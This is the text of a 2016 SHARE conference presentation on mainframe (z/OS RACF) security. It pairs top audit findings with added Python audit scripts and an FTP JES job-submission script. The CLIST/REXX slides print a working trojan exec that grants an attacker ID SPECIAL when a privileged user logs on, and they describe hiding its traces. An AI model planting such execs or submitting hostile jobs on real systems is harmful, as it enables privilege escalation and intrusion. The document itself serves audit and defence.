Co-presentation with Brian Marshall, Mark Wilson, and Chad Rikansrud at SHARE Atlanta, 2016, discussing the various approaches to mainframe security and hacking.
6. www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
"Top Five" Assessment Finding #4

Finding: Critical data sets with 'global access' greater than READ

Explanation: The UACC value of a RACF data set profile defines the default level of access for any user whose user ID, or a group to which it is connected, does not appear in the profile's access list. In Top Secret, the ALL record holds the data sets that carry a default level of access for all users. CA ACF2 has no equivalent: everything must be explicitly allowed.

Risk: Data sets protected with a 'global access' greater than READ allow most users with system access to modify the critical data residing in them. In addition, users may be able to delete any data set covered by a profile that has global access defined.

Recommended best practice and remediation: Review each of these profiles and determine whether the 'global access' is appropriate. Where the access is excessive, determine who really needs it before changing the 'global access'. To find out who is actually using these data sets, review SMF data for accesses above READ. Note that RACF only writes success records for accesses the profile (or SETROPTS LOGOPTIONS) audits, so you may need to set AUDIT(SUCCESS(UPDATE)) on the profile for a period first.
"Top Five" Assessment Finding #3

Finding: Sensitive data sets with 'global access' greater than NONE

Explanation: The UACC value of a RACF data set profile defines the default level of access for any user whose user ID, or a group to which it is connected, does not appear in the profile's access list. In Top Secret, the ALL record holds the data sets that carry a default level of access for all users. CA ACF2 has no equivalent: everything must be explicitly allowed.

Risk: Data sets protected with a 'global access' greater than NONE allow most users with system access to read or modify them. In addition, users may be able to delete any data set covered by a profile that has global access defined.

Recommended best practice and remediation: Review each of these profiles and determine whether the 'global access' is appropriate. Where the access is excessive, determine who really needs it before changing the 'global access'. To find out who is actually using these data sets, review SMF data for accesses made through the 'global access' (again, the profile must be auditing successes at the relevant level for those records to exist).
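The two 'global access' findings above come down to the same check: parse the data set profiles and compare each UACC against a threshold (READ for critical data, NONE for sensitive data). The script below is an added example, not code from the SHARE deck. It parses the SYSTSPRT output of the RACF LISTDSD command (for example "LD PREFIX(SYS1) GENERIC" run under IKJEFT01 in batch); the sample output embedded in it is constructed to follow the LISTDSD layout as I know it, so confirm the column headings against your own system before trusting the parser on real output. It also reports any profile in WARNING mode, because RACF grants every request against such a profile (after logging a warning) whatever UACC says. Only RACF is handled; Top Secret (ALL record) and ACF2 need their own extractors.

```python
"""Flag RACF data set profiles whose universal access (UACC) is too permissive.

Added example for the two 'global access' findings; not code from the deck.
Input: SYSTSPRT output of LISTDSD.  SAMPLE_LISTDSD is constructed to match
the LISTDSD layout as I know it; verify against your own system.
"""
import re

# RACF access levels, least to most permissive.
ACCESS_RANK = {"NONE": 0, "EXECUTE": 1, "READ": 2, "UPDATE": 3, "CONTROL": 4, "ALTER": 5}

# Constructed sample covering four profiles.  Real output carries more
# sections (AUDITING, NOTIFY, YOUR ACCESS, ...) which the parser skips.
SAMPLE_LISTDSD = """\
INFORMATION FOR DATASET SYS1.PARMLIB (G)

LEVEL  OWNER    UNIVERSAL ACCESS  WARNING ERASE
-----  -------- ----------------  ------- -----
 00    SYS1          UPDATE         NO     NO

AUDITING
--------
FAILURES(READ)

INFORMATION FOR DATASET SYS1.LINKLIB (G)

LEVEL  OWNER    UNIVERSAL ACCESS  WARNING ERASE
-----  -------- ----------------  ------- -----
 00    SYS1          READ           NO     NO

INFORMATION FOR DATASET SYS1.RACF* (G)

LEVEL  OWNER    UNIVERSAL ACCESS  WARNING ERASE
-----  -------- ----------------  ------- -----
 00    SYS1          NONE           NO     NO

INFORMATION FOR DATASET PROD.PAYROLL.** (G)

LEVEL  OWNER    UNIVERSAL ACCESS  WARNING ERASE
-----  -------- ----------------  ------- -----
 00    PAYOWN        READ           YES    NO
"""

PROFILE_RE = re.compile(r"^INFORMATION FOR DATASET (\S+)( \(G\))?")


def parse_listdsd(text):
    """Return one dict per profile: name, generic flag, owner, uacc, warning."""
    profiles, lines = [], text.splitlines()
    current = None
    for i, line in enumerate(lines):
        m = PROFILE_RE.match(line)
        if m:
            current = {"name": m.group(1), "generic": m.group(2) is not None}
            profiles.append(current)
        elif current is not None and "UNIVERSAL ACCESS" in line:
            # Heading line, then the dashed rule, then the values line.
            level, owner, uacc, warning, erase = lines[i + 2].split()[:5]
            current.update(owner=owner, uacc=uacc, warning=(warning == "YES"))
    return profiles


def uacc_above(profiles, threshold, name_filter=lambda name: True):
    """Names of profiles whose UACC is strictly above `threshold`.

    A profile in WARNING mode is always reported: RACF allows the access
    (and logs a warning) regardless of the UACC or access list.
    """
    limit = ACCESS_RANK[threshold]
    hits = []
    for p in profiles:
        if not name_filter(p["name"]):
            continue
        if p.get("warning") or ACCESS_RANK.get(p.get("uacc", "NONE"), 0) > limit:
            hits.append(p["name"])
    return hits


def critical_dataset_findings(profiles):
    """Finding #4: any data set profile with 'global access' above READ."""
    return uacc_above(profiles, "READ")


def sensitive_dataset_findings(profiles, sensitive_prefixes):
    """Finding #3: profiles for sensitive data (matched by prefix) with UACC above NONE."""
    return uacc_above(profiles, "NONE",
                      lambda name: name.startswith(tuple(sensitive_prefixes)))


if __name__ == "__main__":
    profs = parse_listdsd(SAMPLE_LISTDSD)
    print("UACC > READ :", critical_dataset_findings(profs))
    print("UACC > NONE :", sensitive_dataset_findings(profs, ["PROD.PAYROLL", "SYS1.RACF"]))
```

The prefix list passed to sensitive_dataset_findings() is where your own knowledge of the estate goes in (RACF database backups, ICSF key data sets, payroll and so on); the parser does not know which data is sensitive.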
"Top Five" Assessment Finding #2

Finding: Inappropriate usage of z/OS UNIX superuser privilege, UID(0)

Explanation: User IDs with z/OS UNIX superuser authority, UID(0), have full access to all UNIX directories and files and full authority to administer z/OS UNIX.

Risk: Since the UNIX environment is the z/OS portal for critical applications such as file transfers, web applications, and TCP/IP connectivity to the network in general, the ability of these superusers to accidentally or maliciously affect these operations is a serious threat. No personal user IDs should be defined with an OMVS segment specifying UID(0).

Remediation: Minimize the assignment of UID(0) by managing superuser privileges through access to one or more 'BPX.qualifier' profiles in the FACILITY class (BPX.SUPERUSER, for example, which lets a user switch to superuser only when needed) and/or access to one or more profiles in the UNIXPRIV class, which grant individual superuser functions.
"Top Five" Assessment Finding #1

Finding: Excessive number of user IDs with no password interval

Explanation: User IDs with no password interval are never required to change their passwords.

Risk: Since the passwords need not be changed periodically, people who once knew the password for an ID can still use that ID even after they are no longer authorized users.

Remediation: Review each personal user profile to determine why it requires no expiration. Passwords should adhere to the company policy on password changes. If the user ID is used for started tasks or as a surrogate, review it and convert it to the appropriate ESM privilege (in RACF, a PROTECTED user ID, which has no password and cannot be used to log on at all).
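Findings #2 and #1 are both user-profile audits, and at site scale the practical data source is the RACF database unload produced by IRRDBU00, not LISTUSER one ID at a time. The script below is an added example, not the presenters' code. It reads the fixed-column 0200 (user basic data) and 0270 (user OMVS data) records; the column offsets in FIELDS are taken from those record layouts in z/OS Security Server RACF Macros and Interfaces and are an assumption you must verify against the manual for your release, as is the reading of the NOPWD flag. The sample records are constructed to those offsets so the logic runs offline.

```python
"""Audit RACF user profiles for UID(0) (finding #2) and for missing or
over-long password intervals (finding #1) from an IRRDBU00 unload.

Added example, not the presenters' code.  Column offsets and the polarity of
the NOPWD flag are assumptions to verify against your release's manual.
"""

# 1-based inclusive column ranges, as the manual lists them (verify!).
FIELDS = {
    "0200": {"name": (6, 13), "special": (40, 43),
             "pwd_interval": (60, 62), "nopwd": (391, 394)},
    "0270": {"name": (6, 13), "uid": (15, 24)},
}
RECORD_WIDTH = 400   # enough for the fields used here; real records are longer


def make_record(rtype, **values):
    """Construct a test record with each field placed at its column range."""
    buf = [" "] * RECORD_WIDTH
    buf[0:4] = rtype
    for name, value in values.items():
        start, end = FIELDS[rtype][name]
        buf[start - 1:end] = value.ljust(end - start + 1)
    return "".join(buf)


def field(record, rtype, name):
    """Extract and strip one field from a fixed-column record."""
    start, end = FIELDS[rtype][name]
    return record[start - 1:end].strip()


def audit_users(records, max_interval=90):
    """Return (uid0_users, interval_findings).

    uid0_users: user IDs whose OMVS segment carries UID 0.
    interval_findings: (user ID, interval value, is SPECIAL) for IDs whose
    password interval is absent, zero, or longer than `max_interval` days.
    IDs with no password at all (PROTECTED / NOPASSWORD) are skipped: that is
    the correct setup for started tasks and is not this finding.
    """
    uid0, interval_findings = [], []
    for rec in records:
        rtype = rec[0:4]
        if rtype == "0270":
            uid = field(rec, "0270", "uid")
            if uid.isdigit() and int(uid) == 0:
                uid0.append(field(rec, "0270", "name"))
        elif rtype == "0200":
            # Assumption: YES here means "the user has no password".
            if field(rec, "0200", "nopwd") == "YES":
                continue
            interval = field(rec, "0200", "pwd_interval")
            if not interval.isdigit() or int(interval) == 0 or int(interval) > max_interval:
                interval_findings.append((field(rec, "0200", "name"),
                                          interval or "none",
                                          field(rec, "0200", "special") == "YES"))
    return uid0, interval_findings


# Constructed sample: four users, two of them with OMVS segments.
SAMPLE_RECORDS = [
    make_record("0200", name="ALICE", special="NO", pwd_interval="030", nopwd="NO"),
    make_record("0200", name="BOB", special="YES", pwd_interval="", nopwd="NO"),
    make_record("0200", name="CAROL", special="NO", pwd_interval="254", nopwd="NO"),
    make_record("0200", name="STCUSER", special="NO", pwd_interval="", nopwd="YES"),
    make_record("0270", name="ALICE", uid="0000001001"),
    make_record("0270", name="BOB", uid="0000000000"),
]

if __name__ == "__main__":
    uid0, findings = audit_users(SAMPLE_RECORDS)
    print("UID(0):", uid0)
    print("Password interval findings:", findings)
```

The SPECIAL flag is carried in the output so that an ID like BOB above (SYSTEM SPECIAL, no interval, UID 0) is reviewed first. How a NOINTERVAL user shows up in the interval field (blank or zero) is not something to guess: run IRRDBU00 against a known NOINTERVAL ID and look.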
Top Ten Critical Assessment Findings in Mainframe Environments

Frequency  Finding                                                        Severity
74%        Excessive number of user IDs with no password interval         SEVERE
60%        Inappropriate usage of z/OS UNIX superuser privilege, UID=0    SEVERE
54%        Sensitive data sets with 'global access' greater than NONE     SEVERE
54%        Critical data sets with 'global access' greater than READ      HIGH
53%        Started task IDs are not defined as 'protected' IDs            HIGH
52%        Improper use or lack of UNIXPRIV profiles                      HIGH
44%        Excessive access to the SMF data sets                          HIGH
42%        Excessive access to APF libraries                              SEVERE
42%        Excessive access to z/OS UNIX file system data sets            HIGH
40%        ESM database(s) not adequately protected                       SEVERE
10/14/15
Poorly protected APF libraries
● Very simple exploit
● It is not uncommon to find hundreds of users with UPDATE access to APF-authorised libraries...
● What is most alarming is that the client sites typically have 10 or fewer system programmers
● Having UPDATE authority to an APF-authorised library means I can write my own authorised code and run it undetected
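"Hundreds of users" with UPDATE on an APF library rarely appear as hundreds of user IDs in the access list: they arrive through groups and through UACC. The script below is an added example (not the presenters' code) that turns the APF list into a per-library count of user IDs who can update it. It parses the console reply to the operator command D PROG,APF (message CSV450I), works out which RACF data set profile covers each library, and expands that profile's access list through group membership. The CSV450I text is constructed from the format as I know it; the profiles, access lists and group memberships are constructed stand-ins for what you would pull from IRRDBU00 (0400/0404 data set records, 0102 group member records). The generic-profile matching is a simplification of RACF's rules (literal beats %, which beats *, which beats **, compared left to right) and should be treated as such.

```python
"""Count who can update each APF-authorized library.

Added example, not the presenters' code.  D PROG,APF sample, profiles,
access lists and groups are all constructed.  Generic matching is a
simplification of RACF's rules.
"""
import re

ACCESS_RANK = {"NONE": 0, "EXECUTE": 1, "READ": 2, "UPDATE": 3, "CONTROL": 4, "ALTER": 5}

# Constructed console reply to D PROG,APF.
SAMPLE_D_PROG_APF = """\
CSV450I 10.21.33 PROG,APF DISPLAY 417
FORMAT=DYNAMIC
ENTRY VOLUME DSNAME
  1   Z22RS1 SYS1.LINKLIB
  2   Z22RS1 SYS1.SVCLIB
  3   *SMS*  SYS2.APF.LOAD
  4   USR001 DEV.TEST.LOADLIB
"""

# Constructed RACF data: profile -> (UACC, {id: access}); group -> members.
PROFILES = {
    "SYS1.**":    ("READ",   {"SYSPROG": "ALTER"}),
    "SYS2.APF.*": ("READ",   {"SYSPROG": "ALTER", "APPDEV": "UPDATE"}),
    "DEV.**":     ("UPDATE", {"SYSPROG": "ALTER"}),
}
GROUPS = {
    "SYSPROG": ["SP01", "SP02", "SP03"],
    "APPDEV": ["DEV%03d" % i for i in range(140)],
}


def parse_apf_list(text):
    """Data set names from a CSV450I display (ENTRY / VOLUME / DSNAME rows)."""
    libs = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0].isdigit():
            libs.append(parts[2])
    return libs


def _tokens(profile):
    """Split a profile into literal chars and the generic tokens **, *, %."""
    return re.findall(r"\*\*|\*|%|[^*%]", profile)


def profile_regex(profile):
    """** = any qualifiers, * = rest of a qualifier, % = one character (simplified)."""
    parts = {"**": ".*", "*": "[^.]*", "%": "[^.]"}
    return re.compile("^" + "".join(parts.get(t, re.escape(t)) for t in _tokens(profile)) + "$")


def specificity(profile):
    """Sort key: lower is more specific (literal < % < * < **), left to right."""
    rank = {"%": 1, "*": 2, "**": 3}
    return [rank.get(t, 0) for t in _tokens(profile)]


def covering_profile(dsn, profiles):
    matches = [p for p in profiles if profile_regex(p).match(dsn)]
    return min(matches, key=specificity) if matches else None


def updaters(profile, profiles, groups):
    """(user IDs with UPDATE or higher via the access list, UACC alone grants UPDATE?)"""
    uacc, acl = profiles[profile]
    users = set()
    for ident, access in acl.items():
        if ACCESS_RANK[access] >= ACCESS_RANK["UPDATE"]:
            users.update(groups.get(ident, [ident]))   # a group expands to its members
    return users, ACCESS_RANK[uacc] >= ACCESS_RANK["UPDATE"]


def apf_update_report(apf_text, profiles, groups, sysprog_count=10):
    """One tuple per APF library: (library, profile, updater count, excessive?).

    Excessive = UACC allows UPDATE, more updaters than there are system
    programmers, or no profile at all (without PROTECTALL that means anyone).
    """
    report = []
    for lib in parse_apf_list(apf_text):
        prof = covering_profile(lib, profiles)
        if prof is None:
            report.append((lib, None, None, True))
            continue
        users, uacc_update = updaters(prof, profiles, groups)
        report.append((lib, prof, len(users), uacc_update or len(users) > sysprog_count))
    return report


if __name__ == "__main__":
    for row in apf_update_report(SAMPLE_D_PROG_APF, PROFILES, GROUPS):
        print(row)
```

In the constructed data, SYS2.APF.LOAD ends up with 143 updaters because an application development group holds UPDATE, and DEV.TEST.LOADLIB is open to everyone through UACC(UPDATE): exactly the two ways the slide's "hundreds of users" happen. RACF's real rules (for instance a lone `*` qualifier, and the PROTECTALL setting) need checking before acting on the report.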
Now the good bit!
● Why/how does this work?
● Well, that little bit of code flipped a flag in my ACEE to turn on the RACF SPECIAL flag for my in-storage ACEE
● This can be modified so that it looks very innocent, e.g. part of a translate table, or it can be rewritten in a virus-type manner, making it more difficult to disassemble
CLIST/REXX Issues
● We quite often see CLIST/REXX libraries that are universally updateable and are not at the bottom of the list of concatenated data sets for SYSPROC or SYSEXEC
● Simply find an exec lower down in the concatenation that is used by one of the privileged users (security admin, sysprog, etc.)
● Copy the exec to the universally accessible data set and add a bit of your own code
CLIST/REXX Issues
● An example
● When doing a pen test we determined that we had UPDATE authority to a CLIST/REXX library allocated and used each time we logged on to TSO... the data set was called USER.CLIST
● Add to this the fact that
  – All users, via their logon proc, call the same exec, WBA001
● A simple update to WBA001 to call a little piece of code...
● And then just sit and wait...
CLIST/REXX Issues
The contents of USER.CLIST(MYCMD):

/* REXX */
/***************************************************/
/* Trap the responses so no messages are issued to  */
/* the user as they log on....                      */
/***************************************************/
TEMP = OUTTRAP('LINE.')
/* Is this the user I want to exploit?              */
UID = SYSVAR('SYSUID')
/* If so, get THEM to issue the command you want    */
IF UID = 'CHAD' | UID = 'BRIAN' THEN DO
  ADDRESS TSO "ALU MY_HACKER_ID SPECIAL OPERATIONS"
END
TEMP = OUTTRAP('OFF')

(Callout on the slide: could use a prefix test with SUBSTR to target a group of users!)
CLIST/REXX Issues
● So why pick on CHAD or BRIAN?
  – We determined from looking at the syslog and the output on the queue that CHAD and BRIAN were RACF SYSTEM SPECIAL
● So the next time either of them logs onto the system, any command entered into MYCMD is run... game over...
● I can even cover my tracks by resetting the ISPF stats to show another user ID as having last changed WBA001 and MYCMD
● Imagine if I changed it to CHAD or BRIAN!!
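The defensive version of the CLIST/REXX slides is a concatenation review: for each TSO logon procedure, list the SYSPROC and SYSEXEC libraries in search order, mark the ones most users can update, and ask which execs could be planted or pre-empted from them. The script below is an added example, not the presenters' code. The logon procedure JCL, the UACC of each library and the member lists are constructed; the real inputs are the proclib member, LISTDSD/IRRDBU00 and a directory listing of each library. The search order assumed is TSO/E's default for an implicitly invoked exec: SYSEXEC first, then SYSPROC, each concatenation top to bottom.

```python
"""Find update-able libraries in a TSO logon proc's SYSPROC/SYSEXEC
concatenations and what could be planted or shadowed from them.

Added example, not the presenters' code.  JCL, UACCs and member lists are
constructed; search order assumed is SYSEXEC then SYSPROC, top to bottom.
"""
import re

ACCESS_RANK = {"NONE": 0, "EXECUTE": 1, "READ": 2, "UPDATE": 3, "CONTROL": 4, "ALTER": 5}
SEARCH_ORDER = ("SYSEXEC", "SYSPROC")

# Constructed logon procedure.
SAMPLE_LOGON_PROC = """\
//TSOLOGON PROC
//IKJEFT01 EXEC PGM=IKJEFT01,DYNAMNBR=100,REGION=0M
//SYSEXEC  DD DISP=SHR,DSN=SYS1.SAXREXEC
//SYSPROC  DD DISP=SHR,DSN=SYS1.CLIST
//         DD DISP=SHR,DSN=USER.CLIST
//         DD DISP=SHR,DSN=ISP.SISPCLIB
//SYSPRINT DD TERM=TS
//SYSTSPRT DD TERM=TS
//SYSTSIN  DD DUMMY
"""
# Constructed UACC per library and (partial) member lists.
UACC = {"SYS1.SAXREXEC": "READ", "SYS1.CLIST": "READ",
        "USER.CLIST": "UPDATE", "ISP.SISPCLIB": "READ"}
MEMBERS = {"SYS1.SAXREXEC": {"SPEEDUP"}, "SYS1.CLIST": {"LOGON"},
           "USER.CLIST": {"WBA001"}, "ISP.SISPCLIB": {"ISPFCL01", "ISPFCL02"}}

DD_RE = re.compile(r"^//(\S*)\s+DD\s+(.*)$")          # named DD or a '//   DD' continuation
DSN_RE = re.compile(r"DSN(?:AME)?=([A-Z0-9$#@.]+)")


def parse_concatenations(jcl, ddnames=SEARCH_ORDER):
    """Map each DD name of interest to its list of data sets, in JCL order."""
    concats = {dd: [] for dd in ddnames}
    current = None
    for line in jcl.splitlines():
        m = DD_RE.match(line)
        if not m:
            continue
        ddname, params = m.groups()
        if ddname:                                   # a new DD statement starts
            current = ddname if ddname in ddnames else None
        dsn = DSN_RE.search(params)
        if current and dsn:
            concats[current].append(dsn.group(1))
    return concats


def search_path(concats):
    """(ddname, position, library) in the order TSO/E searches them."""
    return [(dd, pos, lib) for dd in SEARCH_ORDER
            for pos, lib in enumerate(concats.get(dd, []), 1)]


def writable_libraries(concats, uacc):
    """Libraries in the search path whose UACC allows UPDATE or higher."""
    return [(dd, pos, lib, uacc.get(lib, "NONE")) for dd, pos, lib in search_path(concats)
            if ACCESS_RANK.get(uacc.get(lib, "NONE"), 0) >= ACCESS_RANK["UPDATE"]]


def resolve(member, concats, members):
    """Which library an implicitly invoked exec/CLIST is taken from."""
    for _, _, lib in search_path(concats):
        if member in members.get(lib, ()):
            return lib
    return None


def shadowable(writable_lib, concats, members):
    """Members that a same-named member dropped into writable_lib would
    pre-empt: everything living in a library later in the search order."""
    path = [lib for _, _, lib in search_path(concats)]
    later = path[path.index(writable_lib) + 1:]
    return {m for lib in later for m in members.get(lib, ())}


if __name__ == "__main__":
    c = parse_concatenations(SAMPLE_LOGON_PROC)
    for dd, pos, lib, acc in writable_libraries(c, UACC):
        print("%s #%d %s UACC(%s) shadows %s" % (dd, pos, lib, acc, sorted(shadowable(lib, c, MEMBERS))))
    print("WBA001 resolves to", resolve("WBA001", c, MEMBERS))
```

Two distinct problems fall out of the constructed data: WBA001, run by every logon, is itself taken from the writable library (the slide's case), and every CLIST in ISP.SISPCLIB behind it could be shadowed by a same-named member. Moving a writable library to the bottom fixes only the second; an exec that lives in the writable library stays exposed wherever it sits.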
Introduction – Chad Rikansrud
• 20 Years in Information Technology
• Networking Protocols / Forensics
• Programming (Assembler, C, Python, others)
• Security & Security Research (z/OS, x86_64)
– Contributor to open source projects:
• Metasploit, r2 disassembly framework, scrypt
• Cryptography implementations / protocols
• Capture the Flag builder (BSides DFW,MSP)
• Speaker at DEF CON, Derbycon, MN SEC, Others
How the bad guys think
● Let's assume 3 types of attackers:
  – No mainframe knowledge, but skilled at exploits on other OSes
  – Some mainframe knowledge, also skilled at other OSes
  – Mainframe knowledge + hacking skills
● Look at 3 possible attacks (based on the above)
  – Java deserialization / poor configuration (works out of the box)
  – Scrape credentials (cleartext or self-signed cert) and use them to submit remote JCL
  – SMP/E injection and forgery
Attack #1 - Java
• The gift that keeps giving
• A combination of inherent vulnerabilities (fixed with patching, SMP/E, etc.) and poorly written code
• Deserialization attacks (common libraries / bad code)
• Java takes care of the code page (EBCDIC/ASCII) issues for you (good for you, good for them!)
Java Exploit Demo
Attack #2 - JCL over FTP with stolen credentials
JCL over FTP
• A fantastic way to remotely exploit a system once you have credentials
• How to get creds (sniff the wire, MITM a self-signed cert)
• How to submit reliable JCL over FTP (Metasploit)
• What to submit? (Shells, pull the password database, etc.)
JCL over FTP demo
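The interface the attack rides on is documented z/OS FTP server behaviour: SITE FILETYPE=JES switches the session from data sets to the job entry subsystem, after which a STOR submits the transferred file as a job. The script below is an added example, not the presenters' or Metasploit's code. Host, credentials and the job are placeholders; validate_jcl() catches the usual reasons a remote submission is rejected (no JOB card first, bad job name, statement text past column 71) and is the part that runs offline. The client insists on TLS with a verified certificate, which is precisely what the "MITM a self-signed cert" credential theft relies on sites not doing.

```python
"""Submit JCL through the z/OS FTP server's JES interface.

Added example, not the presenters' or Metasploit's code.  Host, credentials
and the job text are placeholders.  Only validate_jcl() is exercised offline.
"""
import io
import re
import ssl
from ftplib import FTP_TLS

JOBNAME_RE = re.compile(r"^[A-Z$#@][A-Z0-9$#@]{0,7}$")


def validate_jcl(jcl):
    """Return a list of problems with the deck (an empty list means submittable)."""
    problems = []
    lines = jcl.splitlines()
    if not lines or not lines[0].startswith("//"):
        return ["deck is empty or does not begin with a JCL statement"]
    head = lines[0].split()
    if len(head) < 2 or head[1] != "JOB":
        problems.append("first statement must be the JOB card")
    elif not JOBNAME_RE.match(head[0][2:]):
        problems.append("invalid job name %r" % head[0][2:])
    statements = [l.split() for l in lines if l.startswith("//")]
    if not any(len(s) > 1 and s[1] == "EXEC" for s in statements):
        problems.append("no EXEC statement")
    for n, line in enumerate(lines, 1):
        if line.startswith("//") and len(line.rstrip()) > 71:
            problems.append("line %d: JCL statement text runs past column 71" % n)
        if len(line) > 80:
            problems.append("line %d: longer than an 80-column card image" % n)
    return problems


def submit_job(host, user, password, jcl, cafile=None):
    """Submit `jcl` as a job and return the server's reply to the STOR,
    which names the job (the server replies along the lines of
    '250-It is known to JES as JOBnnnnn')."""
    problems = validate_jcl(jcl)
    if problems:
        raise ValueError("; ".join(problems))
    ctx = ssl.create_default_context(cafile=cafile)   # verifies the server certificate;
    ftp = FTP_TLS(context=ctx)                       # a self-signed cert fails unless it is the cafile
    ftp.connect(host, 21)
    ftp.login(user, password)                        # sent after AUTH TLS, never in the clear
    ftp.prot_p()                                     # protect the data connection too
    ftp.sendcmd("SITE FILETYPE=JES")                 # from here on STOR means "submit"
    reply = ftp.storlines("STOR job.jcl", io.BytesIO(jcl.encode("ascii")))
    ftp.quit()
    return reply


# Placeholder job: one step that does nothing (IEFBR14), used to prove submission works.
SMOKE_JOB = (
    "//PENTEST1 JOB (ACCT),'SMOKE TEST',CLASS=A,MSGCLASS=X,NOTIFY=&SYSUID\n"
    "//STEP1    EXEC PGM=IEFBR14\n"
)

if __name__ == "__main__":
    print(validate_jcl(SMOKE_JOB))     # [] means the deck would be sent
    # print(submit_job("mvs.example.invalid", "USER", "PASS", SMOKE_JOB))  # placeholder host
```

On the defensive side, every job that arrives this way is an FTP login followed by a SITE FILETYPE=JES; the FTP server's SMF type 119 records (and SYSLOG) are where to look for submissions from hosts that are not your schedulers, and a server that still offers plaintext FTP or an unverifiable certificate is handing out the credentials this attack needs.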
Related Sessions

Session # | Session Title | Date and Time | Room | Speaker(s)
19683 | RACF Monitoring & Reporting | 2016-08-02 12:30 | L402 | Robert S. Hansel
19639 | RACF Update | 2016-08-03 08:30 | L401 | Mark Nelson, Julie A. Bergh
19638 | CA ACF2 & CA Top Secret Update - R16 is Finally Here! | 2016-08-03 10:00 | L401 | Carla Flores
19612 | HiperSockets: Capabilities, z/OS Config, Comparison to OSA, RoCE and SMC-D, and Routing to Linux on z | 2016-08-03 11:15 | A601 | Linda Harrison
19646 | RACF IRRXUTIL, System REXX, and the IBM Health Checker for z/OS: A Perfect Combination! | 2016-08-03 13:45 | L402 | Mark Nelson, Julie A. Bergh
19782 | Experiences with Two Factor Authentication (2FA) on z/OS | 2016-08-03 15:15 | A704 | Gary Morgan, Steve Brinkley
19464 | Encryption? Yeah, We Do That | 2016-08-04 10:00 | L505 | Phil Smith III
19389 | Can CICS Be Hacked? Are Yesterday's Practices Today's Exposure? | 2016-08-04 10:00 | A602 | Leigh Compton
19655 | Preparing for a Security Audit? Introducing Key Tracking, Key Validity and Key Archival Using ICSF (Integrated Cryptographic Service Facility) | 2016-08-04 13:45 | A601 | Eysha Shirrine Powers
19241 | z/OS Communications Server Security Using Policy Agent | 2016-08-04 13:45 | L401 | Linda Harrison
19804 | PAGENT & RACF: Security from within the Black Box and Beyond | 2016-08-04 16:30 | L508 | Brian Marshall, Marlaina Chirdon
19239 | Safe and Secure Transfers with z/OS FTP | 2016-08-04 16:30 | L402 | Chris Meyer, Sam Reynolds
19424 | A New Look at Mainframe Hacking and Penetration Testing | 2016-08-05 08:30 | L402 | Mark Wilson
19765 | SHARE Live! - High Expectations: Our Systems Are (or Could Be) as Secure as Airplanes | 2016-08-05 11:15 | A702 | Mark Nelson